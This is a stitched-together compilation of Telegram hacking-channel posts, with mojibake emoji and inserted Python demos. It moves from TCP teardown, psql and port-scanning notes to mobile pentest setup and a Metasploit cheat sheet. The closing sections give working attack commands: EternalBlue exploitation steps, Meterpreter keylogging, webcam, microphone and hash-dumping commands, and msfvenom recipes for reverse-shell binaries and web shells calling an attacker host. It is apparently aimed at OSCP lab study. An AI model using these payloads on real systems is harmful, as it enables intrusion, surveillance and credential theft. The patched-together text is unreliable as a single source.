UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1๏ธโƒฃ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2๏ธโƒฃ Cyber & Tech NEWS:
@Undercode_News

3๏ธโƒฃ CVE @Daily_CVE

โœจ Web & Services:
โ†’ Undercode.help
Download Telegram
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

🦑Connection termination

1️⃣The connection termination phase uses a four-way handshake, with each side of the connection terminating independently. When an endpoint wants to stop its half of the connection, it sends a FIN segment, which the other end acknowledges with a segment carrying the ACK flag.

2️⃣A typical teardown therefore requires a pair of FIN and ACK segments from each TCP endpoint. After the side that sent the first FIN has responded with the final ACK, it waits for a timeout before finally closing the connection; during this time the local port is not available for new connections. This prevents confusion caused by delayed segments being delivered to a later connection on the same port.

3️⃣The connection may be "half-open", in which case one side has completed its part and the other has not. The side that has terminated can no longer send any data on the connection, but the other side can. The terminating side must keep reading data until the other side also completes its work.

4️⃣It is also possible to terminate the connection with a three-way handshake: host A sends FIN, host B answers with FIN & ACK (combining two steps into one), and host A answers with ACK.

5️⃣Some operating systems, such as Linux and HP-UX, implement a half-duplex close sequence in the TCP stack. If the host actively closes the connection while incoming data remains unread, it sends an RST (discarding all received data) instead of a FIN. This assures a TCP application that the remote process has read all the transmitted data, because the application waits for the FIN before it actively closes the connection. The remote process cannot distinguish an RST that aborts the connection from one caused by data loss; both cause the remote stack to discard all data it has received.

6️⃣As the screenshot shows, TCP connection termination can also take this form (Linux with a recent kernel):

Client: FIN-ACK
Server: FIN-ACK
Client: ACK
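The half-open state of point 3 and the RST-on-unread-data behaviour of point 5 can both be observed with plain sockets on the loopback interface. The script below is an added example, not part of the original post: in the first pair the client calls shutdown(SHUT_WR) to send its FIN while it keeps reading the server's reply (and shows that a further send on its own half fails with EPIPE); in the second pair the client closes while received data is still unread. It assumes a Linux host, where the post says the second close is answered with RST rather than FIN; the helper names and the byte strings exchanged are constructed for the demo.

```python
import socket
import threading

HOST = "127.0.0.1"   # loopback only: this is a local demonstration, not a network test


def _serve_one(listener, handler, results):
    """Accept a single connection, hand it to `handler`, then close it."""
    conn, _ = listener.accept()
    conn.settimeout(5)
    try:
        handler(conn, results)
    finally:
        conn.close()


def _listener():
    lst = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lst.bind((HOST, 0))
    lst.listen(1)
    lst.settimeout(5)
    return lst


def half_close_demo():
    """Point 3: the client sends its FIN but keeps reading what the server still sends."""
    results = {}
    listener = _listener()

    def server(conn, out):
        data = b""
        while True:
            chunk = conn.recv(4096)
            if not chunk:               # recv() returning b"" is the peer's FIN
                break
            data += chunk
        out["server_read"] = data
        conn.sendall(b"reply after your FIN")   # our sending half is still open

    worker = threading.Thread(target=_serve_one, args=(listener, server, results))
    worker.start()
    client = socket.create_connection((HOST, listener.getsockname()[1]), timeout=5)
    client.sendall(b"request")
    client.shutdown(socket.SHUT_WR)        # sends FIN: "no more data from me"
    try:
        client.send(b"late byte")          # must fail: our sending half is closed
    except OSError as exc:
        results["send_after_fin_errno"] = exc.errno   # EPIPE (32) on Linux
    reply = b""
    while True:
        chunk = client.recv(4096)          # receiving half works until the server's FIN
        if not chunk:
            break
        reply += chunk
    results["client_read"] = reply
    client.close()
    worker.join()
    listener.close()
    return results


def close_with_unread_data_demo():
    """Point 5: close() with data still unread makes Linux send RST instead of FIN."""
    results = {}
    listener = _listener()

    def server(conn, out):
        conn.sendall(b"payload the client never reads")
        try:
            chunk = conn.recv(4096)
            out["server_saw"] = "fin" if chunk == b"" else "data"
        except ConnectionResetError:
            out["server_saw"] = "rst"      # abortive close: anything in flight is lost

    worker = threading.Thread(target=_serve_one, args=(listener, server, results))
    worker.start()
    client = socket.create_connection((HOST, listener.getsockname()[1]), timeout=5)
    client.recv(1, socket.MSG_PEEK)        # wait for the data to arrive without consuming it
    client.close()                         # receive queue is not empty -> RST on Linux
    worker.join()
    listener.close()
    return results


if __name__ == "__main__":
    print(half_close_demo())
    print(close_with_unread_data_demo())
```

The second demo is the one that matters operationally: a server that writes a response and closes without draining the request can turn an orderly close into an RST, and the peer then sees "connection reset" with no way to tell it apart from data loss.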

Written by Undercode
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

🦑How to display the actual PostgreSQL queries behind psql's backslash commands
#REQUESTED

1) Displays the actual queries generated by \d and other backslash commands.

2) You can use this to examine psql's internal operations.
It is equivalent to starting psql with -E (--echo-hidden), which sets the ECHO_HIDDEN variable; from inside psql:

> \set ECHO_HIDDEN

🦑Output :

postgres=# \l
********* QUERY **********
SELECT d.datname as "Name",
       pg_catalog.pg_get_userbyid(d.datdba) as "Owner",
       pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding",
       d.datcollate as "Collate",
       d.datctype as "Ctype",
       pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges"
FROM pg_catalog.pg_database d
ORDER BY 1;
**************************

                                  List of databases
   Name    |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges
-----------+----------+----------+-------------+-------------+-----------------------
 postgres  | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 template0 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
           |          |          |             |             | postgres=CTc/postgres
 template1 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
           |          |          |             |             | postgres=CTc/postgres
(3 rows)



โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Support & Share Us โค๏ธ๐Ÿ‘๐Ÿป

T.me/UndercodeTesting
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

🦑Network Terms in Angry IP Scanner
Further tips from the program itself:

General information

Angry IP Scanner is a tool for scanning IP addresses.

It is used to scan IP addresses in order to find active hosts and collect interesting information about each of them.

You can start by specifying the IP addresses to scan (local IPs are entered by default) and clicking the "Start" button.

Key terms:

Feeder - the source of IP addresses for scanning. Angry IP Scanner offers several feeders: IP Range, IP List File or Random. Select one from the drop-down list next to the "Start" button.

Data collector - collects a specific piece of information about a host, for example ping time, host name or open ports. Collectors appear as columns in the scan results. They can be selected in the menu "Tools -> Data Collectors".

Active host - a host that responds to ping. Marked in blue in the results list.

Inactive host - a host that does not respond to ping (red). It may still have open ports (if a firewall blocks ping). To scan such hosts fully, tick the "Scan inactive" checkbox in Tools -> Preferences.

Open port - a TCP port that accepted the connection attempt. Shown in green in the list.

Filtered port - a TCP port that neither accepts the connection nor reports that it is closed (no RST packet comes back). Such ports are most likely deliberately blocked by a firewall.

Pinging (host check):

Angry IP Scanner can use several ping methods; they are selected in the "Preferences" window.

ICMP echo is the standard method used by the 'ping' program. On most platforms it requires administrator privileges. Some firewalls block the reply to an ICMP request, making active hosts look inactive.

UDP - sends UDP datagrams to one of the host's ports and watches whether a response comes back. Not standard, but requires no privileges.

TCP - tries to connect to port 80 (HTTP). It may work better than UDP on some networks, but usually does not.

UDP and TCP pinging often fail to detect routers and other network equipment properly.

TTL (time to live) - this collector works only with ICMP ping. The initial value is usually 64 or 128; the difference between it and the observed value shows the distance to the host in hops.
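As an added illustration (not part of the original post or of Angry IP Scanner), the following Python functions express two of the definitions above in code. hop_distance() turns an observed TTL into an estimated hop count the way the TTL collector does, generalised from the 64 and 128 named above to the other common initial values 32 and 255 (which defaults to consider is this example's assumption). classify_port() draws the open / closed / filtered distinction from the outcome of a single connect(): the handshake completed, the host refused with RST, or nothing came back before the timeout. The demo uses one listening port and one released port on loopback, so it runs offline.

```python
import errno
import socket

# Initial TTL values of common TCP/IP stacks. The text names 64 and 128; 32 and 255
# are added here as the other widely used defaults (an assumption for this example).
COMMON_INITIAL_TTLS = (32, 64, 128, 255)


def hop_distance(observed_ttl):
    """Estimate (initial_ttl, hops) from the TTL seen in an ICMP echo reply.

    The sender's initial TTL is taken to be the smallest common default that is
    not below the observed value; each router on the path decremented it by one.
    """
    if not 1 <= observed_ttl <= 255:
        raise ValueError("TTL must be in 1..255")
    initial = next(t for t in COMMON_INITIAL_TTLS if t >= observed_ttl)
    return initial, initial - observed_ttl


def classify_port(host, port, timeout=1.0):
    """Return the scanner's port state for one TCP connect() attempt.

    open      - the three-way handshake completed
    closed    - the host answered with RST (seen here as ECONNREFUSED)
    filtered  - nothing came back before the timeout (typically a firewall drop)
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        return "open"
    except socket.timeout:
        return "filtered"
    except OSError as exc:
        if exc.errno == errno.ECONNREFUSED:
            return "closed"
        return "unreachable"   # e.g. EHOSTUNREACH: no route, says nothing about the port
    finally:
        sock.close()


def demo_local_ports():
    """Constructed demo on loopback: one listening port and one port nobody listens on."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    open_port = listener.getsockname()[1]

    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()                      # released: a connect here is refused with RST

    try:
        return (classify_port("127.0.0.1", open_port),
                classify_port("127.0.0.1", closed_port))
    finally:
        listener.close()


if __name__ == "__main__":
    for ttl in (64, 52, 117, 240):
        print(ttl, "->", hop_distance(ttl))
    print(demo_local_ports())
```

The "unreachable" branch is kept separate on purpose: a missing route is a statement about the path, not about the port, and lumping it in with "filtered" is how firewall audits end up reporting the wrong thing.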

written by undercode
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

🦑OSINT tool based on namechk.com for checking usernames on more than 100 websites, forums and social networks
(Termux / Linux)

INSTALLATION & RUN :

1๏ธโƒฃgit clone https://github.com/HA71/Namechk.git

2๏ธโƒฃcd Namechk

3๏ธโƒฃSearch available username: ./namechk.sh <username> -au

4๏ธโƒฃSearch available username on specifics websites: ./namechk.sh <username> -au -co

5๏ธโƒฃSearch available username list: ./namechk.sh -l -au

6๏ธโƒฃSearch used username: ./namechk.sh <username> -fu

7๏ธโƒฃSearch used username on specifics websites: ./namechk.sh <username> -fu -co

8๏ธโƒฃSearch used username list: ./namechk.sh -l -fu


ENJOYโค๏ธ๐Ÿ‘๐Ÿป
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

🦑Microsoft warns of major vulnerabilities in Windows DNS server
#News

> Microsoft warned that the company listed a key vulnerability in a Windows DNS server 17 years ago as a "worm." Such vulnerabilities may allow attackers to create special malware, execute code remotely on Windows servers, and create malicious DNS queries, which may eventually lead to the intrusion of infrastructure in enterprises and key departments.

> Visit the MSRC report:

https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/

> "Worm vulnerabilities can spread through vulnerable software without user interaction," explains Mechele Gruhn, Microsoft's chief security project manager. "Windows DNS server is a core network component. Although it is not known whether this vulnerability is used for active attacks, customers must apply Windows updates as soon as possible to resolve this vulnerability."

> Researchers at Check Point discovered a security vulnerability in Windows DNS and reported it to Microsoft in May. If the patch is not applied, it will make the Windows server vulnerable to attacks, but Microsoft pointed out that there is no evidence of this flaw being used.

> Today, all supported versions of Windows Server provide patches to fix the vulnerability, but system administrators must patch the server as soon as possible before malicious actors create malware based on the vulnerability.

> "DNS server vulnerability is a very serious matter," Omri Herscovici, the head of Check Point's vulnerability research team, warned. "Only a few of these types of vulnerabilities have been published. Every organization that uses Microsoft infrastructure, regardless of size, will face significant security risks if they do not apply patches. The worst consequence will be the complete destruction of the entire enterprise network. Microsoft's code has been in existence for more than 17 years; since we can find this vulnerability, it is not impossible for others to have discovered this vulnerability."

> Windows 10 and other client versions of Windows are not affected by this vulnerability, because it only affects Microsoft's Windows DNS Server implementation. Microsoft has also released a registry-based working method to prevent administrators from quickly addressing defects when they cannot quickly patch servers.

> Microsoft gave a maximum risk score of 10 on the Common Vulnerability Scoring System (CVSS), emphasizing the severity of the problem. In contrast, the vulnerability used in the WannaCry attack scored 8.5 on CVSS.


🦑Computer Data Leakage Prevention System

WHAT IS the Computer Data Leakage Prevention System?

(Download address: http://www.grabsun.com/monitorusb.html ) It is an enterprise document security management system designed to protect computer files and prevent the disclosure of business secrets. The system can completely disable the use of USB flash drives and other USB storage devices, and can also block network drives, e-mail, FTP uploads and chat software from being used to send files out of the company. In addition, it integrates a series of computer usage management functions that regulate employees' computer and network use during working hours, which further protects file and network security, improves work efficiency, and achieves the real purpose of network management.

🦑The specific functions of Dashizhi Enterprise Data Anti-Leakage Software are as follows:

1. Completely prohibits the use of USB flash drives, portable hard disks, SD cards, mobile phones connected to the computer, tablets and other devices with storage functions.

2. Completely disables optical and floppy drives. Alternatively, it can prohibit only burning, limiting the use of writable optical drives without affecting playback.

3. Completely disables the computer's COM port, prohibits the use of computer ports, and prohibits external devices such as printers.

4. Comprehensively protects the operating system: prohibits modifying the registry, modifying group policies, using msconfig, booting into safe mode, using the task manager, using the device manager, and so on.

5. Comprehensively prevents employees from uninstalling it, and prevents it from being mistakenly killed or intercepted by anti-virus software, protecting computer information security and enterprise commercial secrets to the greatest extent.

6. Lets network administrators set blacklists of programs that computers may not run and whitelists of programs that alone may run, plus blacklists of URLs that may not be accessed and whitelists of URLs that alone may be accessed, strengthening control over computer usage.

7. Effectively prohibits network hotspots, 360 portable WiFi, Baidu portable WiFi, WiFi sharing wizards and WiFi master keys, preventing employees from using portable WiFi to give their laptops, mobile phones or tablets Internet access.

8. Adds blocking of e-mail sending, network disk upload, forum attachment upload and FTP upload; allows only specific QQ numbers and specific Aliwangwang accounts to log in; blocks QQ file transfers and uploads to QQ group shared files.

9. Supports both stand-alone installation and management and server/client management based on a C/S architecture, for ease of use.

10. Personalized customization is available. Any kind of computer device and any operating system configuration can be prohibited at any time to protect computer security and commercial secrets.


🦑Some guys here hate Chinese tools, but we post it for learning only!


🦑 FREE iOS COURSES by Apple developers:

1️⃣Face ID and your Apps
iOS
One of the most advanced features of iPhone X, Face ID is a secure biometric authentication technology that lets users easily unlock, authenticate, pay, and quickly access your app with just a glance. While it has many similarities to Touch ID, there are a few key differences. Learn more about...

2️⃣Configuring Your Developer Account for Apple Pay
iOS, macOS
Apple Pay is the easy, secure, and private way to pay for physical goods and services within apps and websites. Find out how you can configure your Apple Developer Account to start using the Apple Pay APIs.

3️⃣Building Sticker Packs
iOS
Turn your artwork into a sticker pack for Messages on iOS 10. Learn how to bundle both images and animations into your sticker pack and test your finished result.

4️⃣Submitting an iMessage App or Sticker Pack - Part 1
iOS
Learn how to distribute your sticker pack on the App Store. Simply add your app to iTunes Connect and enter the required information, including description, keywords, and screenshots.

5️⃣Submitting an iMessage App or Sticker Pack - Part 2
iOS
Find out how to submit your sticker pack to App Review, the last step before your app can be distributed on the App Store.

> WATCH OR DOWNLOAD :
https://developer.apple.com/videos/tutorials



🦑The release of an iOS app is divided into two parts, A and B: first test the app, and if there are no problems, upload it for review!

Part A: Real-device debugging in 5 steps. If the app has already been tested on a real device, skip straight to Part B.

(Be sure to test the app before putting it on the shelf; if it is full of bugs it will still go through review, but only waste time.)


1. Install Appuploader, an iOS helper tool
> http://www.applicationloader.net/appuploader/download.php

2. Log in to Appuploader and apply for the iOS development certificate file (p12)

3. Log in to Appuploader and apply for the iOS development provisioning profile (mobileprovision)

4. Use the iOS certificate file to package the app

5. Install the packaged app on an iPhone to test

Part B: App Store review in 6 steps.

1. Apply for the iOS release certificate

2. Apply for the iOS release provisioning profile

3. Package the ipa

4. Create the app in iTunes Connect

5. Upload the ipa

6. Fill in the app information and submit it for review

@iUndercode
โ– โ–‚ โ–„ iU๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

🦑2020 TOPIC HACKING-PENTESTING
FEATURES:

Multiple Weighted DNSBLs
Multiple Weighted URIBLs
Greylisting
Weighted Regular Expression Filtering
Bayesian
Penalty Box
SenderBase
SSL/TLS
SPF/SRS
Attachment Blocking
ClamAV and FileScan
Blocking Reporting
LDAP support
Backscatter Detection
recipient replacement / GUI user access rights management
MIME charset conversion / DKIM check and signing
multi DB support for all hashes / level based open plugin support
transparent TCP proxy support
Plugins: archive, full attachment check and replacement, OCR
damping (steal spammers time)
AUTH to relay host / POP3 collector
configuration value and file synchronization
Block Reports design could be customized
Razor2 and DCC support using Plugin
SNMP support (monitoring, configuring, control API)
user group import (file or LDAP or command based)
automatic crash analyzer Hidden Markov Model
IPv6 socket support
word stemming (several languages) for Bayesian analyzer
Perl module autoupdate via PPM or CPAN
Hidden Markov Model spam detection engine
full unicode support
DMARC support
private whitelist (legacy, domain based, user based)
private IP and domain lists (legacy, domain based, user based)
CPU affinity settings
web file commander
graphical statistics output (SVG)
native SSL support for target hosts
client SSL certificate validation
private S/MIME signing
corporate S/MIME signing, using a single private certificate
content based executable attachment blocking
content based compressed attachment blocking
BATV check and signing
Message-ID signing and check FBMTV
remote support
Authenticated Received Chain (ARC) processing and signing
RSS feeds for blocked emails using Plugin
zero day virus detection
VirusTotal API

INSTALLATION & RUN :

The Anti-Spam SMTP Proxy (ASSP) Server project aims to create an open-source, platform-independent SMTP proxy server which implements auto-whitelists, self-learning Hidden Markov Model and/or Bayesian filtering, greylisting, DNSBL, DNSWL, URIBL, SPF, SRS, backscatter detection, virus scanning, attachment blocking, SenderBase and multiple other filter methods. Click 'Files' to download the professional version 2.6.3 build 20002.
A Linux (Ubuntu 18.04 LTS) and a FreeBSD 11.2 based ready-to-run OVA of ASSP V2 are also available for download.

> DOWNLOAD :

> https://sourceforge.net/projects/assp/files/latest/download

โœ…Topic 2020 sources

🦑 Mobile Application Test Notes (Android)

Prepping the application
(Since Android Nougat, apps need to be repackaged because they do not trust user-added certificates by default)
- https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html

+ apktool d <path of the .apk file>
+ Update AndroidManifest.xml
- Add android:networkSecurityConfig="@xml/networksecurityconfig" to the <application> tag in the XML
+ Add networksecurityconfig.xml to the res/xml folder
- See the "Trusting user-added CAs for all secure connections" section in
https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html
+ Repackage the application
- apktool b unpackedapkfolder -o <output path to new apk file>
+ Sign the application
- Create a keystore using keytool
- jarsigner -keystore <path to your keystore> -storepass <password> -keypass <password> <path to apk> android
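The manifest and res/xml edits in the steps above are the same two changes every time, so they are worth scripting. The Python below is an added example, not part of the original notes, of apktool or of any Android tooling: it adds the android:networkSecurityConfig attribute to <application> with xml.etree and writes the config file from the "Trusting user-added CAs for all secure connections" section of the blog post linked above. It refuses to overwrite a networkSecurityConfig the app already declares, because that usually means certificate pinning that has to be read before anything is changed. The directory layout assumed is apktool's (AndroidManifest.xml at the top level, resources under res/), the resource name is the one used in the notes, and the sample manifest is constructed.

```python
import os
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
ET.register_namespace("android", ANDROID_NS)      # keep the android: prefix when writing

CONFIG_NAME = "networksecurityconfig"             # resource name used in the notes above
XML_DECL = '<?xml version="1.0" encoding="utf-8"?>\n'

# Config from the "Trusting user-added CAs for all secure connections" section
# of the Android developers blog post linked in the notes.
NETWORK_SECURITY_CONFIG = XML_DECL + """<network-security-config>
    <base-config>
        <trust-anchors>
            <certificates src="system" />
            <certificates src="user" />
        </trust-anchors>
    </base-config>
</network-security-config>
"""


def add_network_security_config(manifest_xml):
    """Return manifest_xml with android:networkSecurityConfig set on <application>.

    Refuses to replace a config the app already declares (usually certificate
    pinning) so that it is reviewed rather than silently overwritten.
    """
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    if app is None:
        raise ValueError("AndroidManifest.xml has no <application> element")
    attr = "{%s}networkSecurityConfig" % ANDROID_NS
    wanted = "@xml/" + CONFIG_NAME
    current = app.get(attr)
    if current is not None and current != wanted:
        raise ValueError("manifest already declares %s; merge it by hand" % current)
    app.set(attr, wanted)
    return XML_DECL + ET.tostring(root, encoding="unicode")


def patch_unpacked_apk(apk_dir):
    """Apply both edits inside an apktool output directory (AndroidManifest.xml at the
    top level, resources under res/); returns the path of the config file written."""
    manifest_path = os.path.join(apk_dir, "AndroidManifest.xml")
    with open(manifest_path, encoding="utf-8") as fh:
        patched = add_network_security_config(fh.read())
    with open(manifest_path, "w", encoding="utf-8") as fh:
        fh.write(patched)
    xml_dir = os.path.join(apk_dir, "res", "xml")
    os.makedirs(xml_dir, exist_ok=True)
    config_path = os.path.join(xml_dir, CONFIG_NAME + ".xml")
    with open(config_path, "w", encoding="utf-8") as fh:
        fh.write(NETWORK_SECURITY_CONFIG)
    return config_path


# Constructed sample manifest (not from any real app) for a stand-alone run.
SAMPLE_MANIFEST = XML_DECL + """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.target">
    <application android:label="Target" android:allowBackup="false">
        <activity android:name=".MainActivity" />
    </application>
</manifest>
"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print("wrote", patch_unpacked_apk(sys.argv[1]))   # argument: the apktool d output folder
    else:
        print(add_network_security_config(SAMPLE_MANIFEST))
```

ElementTree does not preserve XML comments or unused xmlns declarations, so diff the rewritten manifest before running apktool b. The config only takes effect on Android 7.0 (API 24) and later, and an app that pins certificates in code will still reject the proxy's CA regardless of this file.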

Creating an emulator and installing the application

+ Create a virtual device:
- android avd

+ Start the emulator:
- emulator -avd testavd

+ Install the application:
- adb install <path of the .apk file>

+ Open Burp Suite and navigate to Proxy -> Options,
- Edit proxy listeners: enter 'port' as 8080, disable 'loopback only' and select 'support invisible'.

+ Start the emulator and proxy:
- emulator -avd testavd -http-proxy http://localhost:8080

+ Download and install the Burp certificate (.crt) onto the emulator using the adb push command.


Notes:

+ Application file type - x.apk

Install Certs: http://www.realmb.com/droidCert/
SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp

http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf


โœ…git sources
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

🦑Mobile Application Test Notes (iPhone)


Prepping Device and Application:

+ Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04
+ Enable SSH on iPhone/iPad
+ Install iFunbox to install the application (http://www.i-funbox.com)
+ Connect device to lab wireless network
+ Add web proxy settings - IP address of attacking machine port 8080
+ Ensure connection and SSH is working


Prepping Burp Suite:

+ Open Burp Suite and navigate to Proxy -> Options,
- Edit proxy listeners: enter 'port' as 8080, disable 'loopback only' and select 'support invisible'.

+ Download and install the Burp certificate (.crt) onto the iPad.

Mobile Application Penetration Testing:

+ Browse the following Directory for insecure storage
- /private/var/mobile/applications/


Notes:

+ Application file type - x.ipa

+ Easy way:

- Place the attacking machine and the Apple device (with the app installed) on the same wireless network.
- E-mail Burp's .cer to the Apple device and install it.
- Start Burp and disable the firewall on the listening machine.
- Change the proxy settings on the Apple device to point to the listening Burp machine/port.

โœ…git sources
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

🦑METASPLOIT
#FastTips

Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.

Metasploit
Metasploit requires PostgreSQL
systemctl start postgresql

To enable Postgresql on startup
systemctl enable postgresql

MSF Syntax
Start metasploit
msfconsole
msfconsole -q


Show help for command
show -h


Show Auxiliary modules
show auxiliary


Use a module
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_pass



Show the basic information for a module
info


Show the configuration parameters for a module
show options


Set options for a module
set RHOSTS 192.168.1.1-254
set THREADS 10



Run the module
run


Execute an Exploit
exploit


Search for a module
search type:auxiliary login


Metasploit Database Access
Show all hosts discovered in the MSF database
hosts


Scan for hosts and store them in the MSF database
db_nmap


Search machines for specific ports in MSF database
services -p 443


Leverage MSF database to scan SMB ports (auto-completed rhosts)
services -p 443 --rhosts


You may find some boxes that are vulnerable to MS17-010 (AKA EternalBlue). Although not officially part of the intended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built-in Metasploit EternalBlue module. I found that the elevenpaths version works much more reliably. Here are the instructions to install it taken from the following YouTube video:
https://www.youtube.com/watch?v=4OHLor9VaRI


1. First step is to configure the Kali to work with wine 32bit

dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit


2. Download the exploit repository
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

3. Move the exploit to /usr/share/metasploit-framework/modules/exploits/windows/smb

4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)

use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.11.1.73
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run




####Experimenting with Meterpreter####

Get system information from Meterpreter Shell
sysinfo

Get user id from Meterpreter Shell
getuid

Search for a file
search -f *pass*.txt

Upload a file
upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec

Download a file
download c:\\Windows\\system32\\calc.exe /tmp/calc.exe

Invoke a command shell from Meterpreter Shell
shell

Exit the meterpreter shell
exit

Metasploit Exploit Multi Handler
multi/handler to accept an incoming reverse_https_meterpreter payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/



Building Your Own MSF Module
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp /usr/share/metasploit-framework/modules/exploits/linux/misc/gld_postfix.rb ./crossfire.rb
nano crossfire.rb



Post Exploitation with Metasploit - (available options depend on OS and Meterpreter capabilities)
download Download a file or directory
upload Upload a file or directory
portfwd Forward a local port to a remote service
route View and modify the routing table
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
record_mic Record audio from the default microphone for X seconds
webcam_snap Take a snapshot from the specified webcam
getsystem Attempt to elevate your privilege to that of local system.
hashdump Dumps the contents of the SAM database

โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

🦑FOR BEGINNERS:
+ Creating Metasploit Payloads

List payloads
msfvenom -l

Binaries

Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho


Web Payloads

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war


Scripting Payloads

Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl


Shellcode

For all shellcode see 'msfvenom --help-formats' for information on valid parameters. msfvenom will output code that can be cut and pasted into your exploits in the chosen language.

